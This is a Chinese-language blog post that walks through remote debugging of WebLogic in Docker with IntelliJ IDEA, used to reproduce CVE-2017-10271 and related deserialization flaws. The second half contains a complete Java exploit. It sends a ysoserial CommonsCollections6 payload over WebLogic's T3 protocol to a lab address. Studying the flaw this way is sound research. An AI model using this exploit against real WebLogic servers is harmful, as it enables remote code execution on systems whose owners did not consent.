IDEA +docker远程调试weblogic

抄一个IDEA docker的远程调试,复现weblogic被整的大脑偏瘫

vulhub版环境搭建

https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2017-10271

首先将docker的8453开启

修改docker-compose.yml

1
2
3
4
5
6
7
version: '2'
services:
weblogic:
image: vulhub/weblogic
ports:
- "7001:7001"
- "8453:8453"

然后运行docker-compose up -d 下载和运行镜像。

下载完成后

使用docker exec -it weblogic /bin/bash 进入容器,修改/root/Oracle/Middleware/user_projects/domains/base_domain/bin/setDomainEnv.sh

添加两行代码

1
2
debugFlag="true"
export debugFlag

然后docker restart 容器id

因为需要weblogic的源码,所以我们把 weblogic的源码和jdk包都拷贝出来。

docker cp weblogic:/root ./weblogic_jars

然后idea打开/root/Oracle/Middleware/wlserver_10.3/目录

如图

然后使用命令把Middleware目录下所有的*.jar包都放在一个test的文件夹里。

命令如下:

find ./ -name *.jar -exec cp {} ./test/ \;

然后在libraries下添加test目录

在jdk这块选用weblogic10.3.6自带的jdk6

都增加以后

这块就会出现两个目录。

然后我们添加远程服务器。

端口号是8453

然后应用,开启debug

当console出现下面图片时候,说明可以了。

然后在/wlserver_10.3/server/lib/weblogic.jar!/weblogic/wsee/jaxws/WLSServletAdapter.class的129行下断点

burp在wls-wsat进行发包

当出现下图时,说明成功了。

QAX-A-Team版环境搭建

按照如下文档搭建好weblogic 并运行docker后

https://github.com/QAX-A-Team/WeblogicEnvironment

直接把weblogic安装包那个jar的modules提到IDEA库下面

然后配置里远程调试

自己写了个打weblogic 10.3.6的CC6

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
package org.exploit.Weblogic;

import java.io.*;
import java.net.*;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.regex.*;
import java.nio.charset.StandardCharsets;

public class WebLogicExploit {

// Function to generate payload using ysoserial
public static byte[] generatePayload() throws IOException {
String filePath = "cc6.ser";

byte[] payload = new byte[0];
try {
// 读取二进制文件
payload = Files.readAllBytes(Paths.get(filePath));

} catch (IOException e) {
e.printStackTrace();
}
return payload;
}

// Function to send the exploit payload over T3 protocol
public static void T3Exploit(String ip, int port, byte[] payload) throws IOException {
Socket socket = new Socket(ip, port);
OutputStream outputStream = socket.getOutputStream();
InputStream inputStream = socket.getInputStream();

// Send T3 handshake
String handshake = "t3 10.3.6\nAS:255\nHL:19\nMS:10000000\n\n";
outputStream.write(handshake.getBytes(StandardCharsets.UTF_8));
outputStream.flush();

// Read response from the server
byte[] response = new byte[1024];
int len = inputStream.read(response);
String responseData = new String(response, 0, len, StandardCharsets.UTF_8);

// Check if it's WebLogic server
Pattern pattern = Pattern.compile("HELO");
Matcher matcher = pattern.matcher(responseData);
if (matcher.find()) {
System.out.println("WebLogic");
} else {
System.out.println("Not WebLogic");
socket.close();
return;
}

// Construct the full payload with headers and exploit data
byte[] header = hexStringToByteArray("00000000");
byte[] t3Header = hexStringToByteArray("016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006");
byte[] desFlag = hexStringToByteArray("fe010000");

ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
byteArrayOutputStream.write(header);
byteArrayOutputStream.write(t3Header);
byteArrayOutputStream.write(desFlag);
byteArrayOutputStream.write(payload);

byte[] fullPayload = byteArrayOutputStream.toByteArray();

// Set the length in the correct place
byte[] lengthPrefix = new byte[4];
for (int i = 0; i < 4; i++) {
lengthPrefix[i] = (byte) ((fullPayload.length >> (8 * (3 - i))) & 0xFF);
}

// Send the payload
outputStream.write(lengthPrefix);
outputStream.write(fullPayload, 4, fullPayload.length - 4);
outputStream.flush();

socket.close();
}

// Helper function to convert hex string to byte array
private static byte[] hexStringToByteArray(String s) {
int len = s.length();
byte[] data = new byte[len / 2];
for (int i = 0; i < len; i += 2) {
data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4)
+ Character.digit(s.charAt(i + 1), 16));
}
return data;
}

public static void main(String[] args) {
String ip = "192.168.152.128";
int port = 7001;

try {
// Generate the payload
byte[] payload = generatePayload();

// Exploit WebLogic server
T3Exploit(ip, port, payload);
} catch (IOException e) {
e.printStackTrace();
}
}
}

可以看到可以调试

docker images查看docker id

不对,我真是脑残啊我,docker ps查看正在运行的容器id

进入容器:docker exec -it 1985c4752c41 /bin/bash

即可查看是否打成功

参考:https://www.cnblogs.com/ph4nt0mer/p/11772709.html

上一篇:
JDBC Attack漫谈
下一篇:
论java中的XXE